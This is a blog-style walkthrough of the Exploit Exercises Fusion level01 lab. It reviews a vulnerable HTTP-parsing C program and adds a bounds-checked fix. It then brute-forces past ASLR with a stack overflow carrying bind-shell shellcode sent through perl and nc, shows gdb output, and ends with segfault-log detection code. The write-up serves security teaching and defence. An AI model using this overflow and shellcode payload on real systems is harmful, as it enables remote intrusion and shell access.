Over the past week or so I have been following industry news, either by watching my Twitter feed and other social media or by listening to the Risky Business podcast. Most recently KRACK has come to light, with a fair amount of conversation around it. I've also decided to continue on with Fusion, and this time it gets a little more interesting.

We are initially presented with the level01 <https://exploit-exercises.com/fusion/level01/> page, which has something daunting (for me) toggled to "Yes".

ASLR is something I have not had to deal with in the past, so we will see how I go.

Code Review

#include "../common/common.c"

int fix_path(char *path)
{
  char resolved[128]; // realpath() may write up to PATH_MAX bytes here: this is the overflow

  if(realpath(path, resolved) == NULL) return 1; // can't access path. will error trying to open
  strcpy(path, resolved); // unbounded copy back into the request buffer
}

char *parse_http_request()
{
  char buffer[1024];
  char *path;
  char *q;

  // printf("[debug] buffer is at 0x%08x :-)\n", buffer); :D

  // note: buffer is never NUL-terminated after the read
  if(read(0, buffer, sizeof(buffer)) <= 0) errx(0, "Failed to read from remote host");
  if(memcmp(buffer, "GET ", 4) != 0) errx(0, "Not a GET request");

  path = &buffer[4];
  q = strchr(path, ' ');
  if(! q) errx(0, "No protocol version specified");
  *q++ = 0;
  if(strncmp(q, "HTTP/1.1", 8) != 0) errx(0, "Invalid protocol");

  fix_path(path);
  printf("trying to access %s\n", path);

  return path;
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *p;

  background_process(NAME, UID, GID);
  fd = serve_forever(PORT); // forks a child per connection
  set_io(fd);

  parse_http_request();
}

As the hint states, this is simply level00 with Address Space Layout Randomization enabled and no information leak, so my plan was nothing more than throwing the level00 exploit at it.
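The two unbounded copies in fix_path() and the unterminated read() are what level00 and level01 share. As an added example (my code, not the level's), here is what a bounded version of the same path handling looks like: the caller states how much room the path has, the resolved buffer is sized to PATH_MAX, and the request buffer is NUL-terminated before any string function touches it. The names fix_path_safe and request_path are mine.

```c
#define _POSIX_C_SOURCE 200809L  /* realpath(), PATH_MAX */
#include <limits.h>
#include <stdlib.h>
#include <string.h>

/* Hardened stand-in for level01's fix_path() (added example, not the
 * level's code). The original resolves into a 128-byte stack buffer
 * although realpath() may write up to PATH_MAX bytes, then strcpy()s the
 * result back into the request buffer with no bound. Here the caller
 * passes the capacity of `path` and nothing is written unless it fits.
 * Returns 0 on success, 1 if unresolvable, 2 if the result would not fit. */
int fix_path_safe(char *path, size_t path_cap)
{
    char resolved[PATH_MAX];
    size_t len;

    if (realpath(path, resolved) == NULL)
        return 1;
    len = strlen(resolved);
    if (len >= path_cap)              /* keep room for the terminator */
        return 2;
    memcpy(path, resolved, len + 1);
    return 0;
}

/* Bounded version of the level's request parsing. The level reads into
 * buffer without NUL-terminating it, so terminate first and pass the
 * remaining capacity down. Returns NULL on malformed or oversized input. */
char *request_path(char *buffer, size_t nread, size_t buf_cap)
{
    char *path, *q;

    if (nread >= buf_cap)             /* no room to NUL-terminate */
        return NULL;
    buffer[nread] = '\0';
    if (nread < 4 || memcmp(buffer, "GET ", 4) != 0)
        return NULL;
    path = buffer + 4;
    q = strchr(path, ' ');
    if (q == NULL)
        return NULL;
    *q++ = '\0';
    if (strncmp(q, "HTTP/1.1", 8) != 0)
        return NULL;
    /* path lives inside buffer; the resolved copy must stay inside it too */
    if (fix_path_safe(path, buf_cap - 4) != 0)
        return NULL;
    return path;
}
```

A request that exactly fills the buffer is rejected rather than parsed without a terminator, and a resolved path longer than the space left is rejected rather than copied.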

Exploit Development

Once again I found out which port this was listening on by viewing ps -ef:

20001 1222 1 0 17:25 ? 00:00:00 /opt/fusion/bin/level01

At this point I started reading about defeating ASLR. Naturally, brute forcing was the easiest option, so I gave that a crack first. Funnily enough, I was correct on the third go.

First I wanted to see roughly where I would land, so I sent the original level00 exploit at port 20001.

(gdb) attach 1222
Attaching to process 1222
Reading symbols from /opt/fusion/bin/level01...done.
Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb77dc424 in __kernel_vsyscall ()
(gdb) set follow-fork-mode child
(gdb) c
Continuing.
[New process 1793]

➜ Fusion perl -e 'print "GET " . "A"x139 . "\x97\xf9\xff\xbf" . " HTTP/1.1" . "\x90"x32 . "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"' | nc 192.168.43.240 20001

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 1793]
0xbffff997 in ?? ()
(gdb) x/40xw 0xbffff997
0xbffff997: Cannot access memory at address 0xbffff997
(gdb) x/40xw $esp+40
0xbfd6a2b8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfd6a2c8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfd6a2d8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfd6a2e8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfd6a2f8: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfd6a308: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfd6a318: 0x41414141 0x41414141 0x41414141 0x41414141
0xbfd6a328: 0x41414141 0x41414141 0x41414141 0x97414141
0xbfd6a338: 0x00bffff9 0x50545448 0x312e312f 0x90909090
0xbfd6a348: 0x90909090 0x90909090 0x90909090 0x90909090
(gdb) attach 1222
A program is being debugged already. Kill it? (y or n) y
Attaching to program: /opt/fusion/bin/level01, process 1222
Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done.
done.
Loaded symbols for /lib/i386-linux-gnu/libc.so.6
Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/ld-linux.so.2
0xb77dc424 in __kernel_vsyscall ()
(gdb) set follow-fork-mode child
(gdb) c
Continuing.
[New process 1800]

➜ Fusion perl -e 'print "GET " . "A"x139 . "\x97\xf9\xff\xbf" . " HTTP/1.1" . "\x90"x32 . "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"' | nc 192.168.43.240 20001

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 1800]
0xbfd6a338 in ?? ()
(gdb) x/40xw 0xbfd6a338
0xbfd6a338: 0x00bfd6a3 0x50545448 0x312e312f 0x90909090
0xbfd6a348: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfd6a358: 0x90909090 0x90909090 0x90909090 0xe3f7db31
0xbfd6a368: 0x6a534353 0xb0e18902 0x5b80cd66 0x0268525e
0xbfd6a378: 0x6a5c1100 0x89505110 0x58666ae1 0x418980cd
0xbfd6a388: 0xb004b304 0x4380cd66 0x80cd66b0 0x3f6a5993
0xbfd6a398: 0x4980cd58 0x2f68f879 0x6868732f 0x6e69622f
0xbfd6a3a8: 0x5350e389 0x0bb0e189 0x000080cd 0x00000000
0xbfd6a3b8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfd6a3c8: 0x00000000 0x00000000 0x00000000 0x00000000

I noticed that the NOPs weren't far off and decided to just test jumping a bit further up.

➜ Fusion perl -e 'print "GET " . "A"x139 . "\x78\xa3\xd6\xbf" . " HTTP/1.1" . "\x90"x256 . "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x52\x68\x02\x00\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"' | nc 192.168.43.240 20001

➜ Fusion nc 192.168.43.240 4444
id
uid=20001 gid=20001 groups=20001

Success!
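The brute force above only works because serve_forever() forks a child per connection, so each wrong guess crashes one child and the kernel logs it as a segfault while the parent keeps serving. From the defender's side that leaves a very visible trail. As an added example (mine, not from the post), the code below parses constructed lines shaped like the x86 Linux kernel's segfault report (comm[pid]: segfault at ADDR ip ADDR sp ADDR error N) and counts, per program, faults where the faulting address is the instruction pointer itself, which is what each redirected-and-missed jump looks like; the sample pids and addresses are made up.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample lines shaped like the x86 Linux kernel's segfault
 * report (comm[pid]: segfault at ADDR ip ADDR sp ADDR error N); the pids
 * and addresses are made up for this example. */
static const char *sample_log[] = {
    "level01[1793]: segfault at bffff997 ip bffff997 sp bfd6a2b8 error 14",
    "level01[1800]: segfault at bfd6a338 ip bfd6a338 sp bf9c41d8 error 14",
    "level01[1807]: segfault at bf71a338 ip bf71a338 sp bf71a1d8 error 14",
    "sshd[2200]: segfault at 0 ip b7701234 sp bfc00010 error 4",
    NULL,
};

/* Parse one segfault line. Returns 1 on success and fills the program
 * name, faulting address, instruction pointer and stack pointer. */
int parse_segfault(const char *line, char *comm, size_t commsz,
                   unsigned long *at, unsigned long *ip, unsigned long *sp)
{
    char name[64];
    int pid;

    if (sscanf(line, "%63[^[][%d]: segfault at %lx ip %lx sp %lx",
               name, &pid, at, ip, sp) != 5)
        return 0;
    snprintf(comm, commsz, "%s", name);
    return 1;
}

/* Count crashes of `comm` whose faulting address is the instruction
 * pointer itself, i.e. execution was redirected to an unmapped address.
 * Each wrong guess at a stack address against the forking server above
 * looks exactly like this, so a burst of them from one service is worth
 * an alert; the null-pointer read from sshd in the sample does not match. */
int count_control_flow_faults(const char **lines, const char *comm)
{
    int hits = 0;

    for (; *lines != NULL; lines++) {
        char name[64];
        unsigned long at, ip, sp;

        if (!parse_segfault(*lines, name, sizeof name, &at, &ip, &sp))
            continue;
        if (strcmp(name, comm) == 0 && at == ip)
            hits++;
    }
    return hits;
}
```

In a real deployment the lines would come from dmesg or the journal and the count would be taken over a short time window, with a threshold tuned to how often the service legitimately crashes.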